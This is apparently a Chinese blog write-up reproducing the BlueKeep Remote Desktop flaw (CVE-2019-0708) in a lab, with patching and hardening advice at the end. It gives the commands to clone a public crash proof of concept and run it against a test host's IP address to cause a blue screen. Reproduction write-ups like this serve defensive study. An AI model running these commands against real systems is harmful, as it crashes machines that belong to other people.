漏洞復現 | 17年的勒索病毒又雙叕捲土重來了?
- 2019 年 10 月 7 日
- 筆記
0x00 前言
2019年5月14日微軟官方發布安全修補程式,修復了Windows遠程桌面服務的遠程程式碼執行漏洞,該漏洞影響了某些舊版本的Windows系統。此漏洞是預身份驗證且無需用戶交互,這就意味著這個漏洞可以通過網路蠕蟲的方式被利用。利用此漏洞的任何惡意軟體都可能從被感染的電腦傳播到其他易受攻擊的電腦,其方式與2017年WannaCry惡意軟體的傳播方式類似。
以上內容來自360網路安全響應中心。
從微軟官方的消息一出,各大安全廠商都開始發布了漏洞預警,那段時間我也一直在找對應的POC,但要不就是不能利用的POC,要不就是利用以前漏洞寫的POC,更有甚著點擊attack後給你驚喜。

看到這個圖片的時候,真的一副生無可戀的樣子,隨著時間推移,漸漸的也就不怎麼關注這個漏洞了。
直到今天,看到網上有人發一些關於這個漏洞的利用復現影片的時候,才意識到已經過去正好一個月的,此時POC也早就被公布了。
早在在5月31日的時候,n1xbyte就在Github上發布了利用該漏洞導致系統藍屏的可用POC ,所以我們來複現看看吧。
0x01 下載POC
首先git clone程式碼
git clone https://github.com/n1xbyte/CVE-2019-0708.git cd CVE-2019-0708

0x02 開始復現
1、為了順利復現成功,需要將被攻擊機的遠程桌面設為允許,防火牆也需要關掉。
2、被攻擊機的IP地址與作業系統資訊如下:
#被攻擊主機 ip地址:192.168.1.106 系統類型:64位
3、安裝需要的庫後執行POC
pip3 install impacket python3 crashpoc.py 192.168.1.106 64 #python3 crashpoc.py ip地址 系統類型

POC被成功被執行,雖然現階段只是讓目標藍屏,但是對這個漏洞的利用手段絕對不會止步於此。
0x03 修復方案
1、最簡便的方法就是安裝一個安全管家,比如火絨、360之類的
2、把系統的自動更新打開或者到微軟官網下載修補程式
3、把自己電腦上的遠程桌面關掉、防火牆開啟
0x04 小結
總是有人說沒有絕對的安全,當然事實也確實是如此,但是只要我們平時養成一個良好的安全習慣,還是可以避免很多病毒木馬的侵害的,畢竟很多的惡意程式都是廣撒網,捕的魚多不多就是另一回事兒了。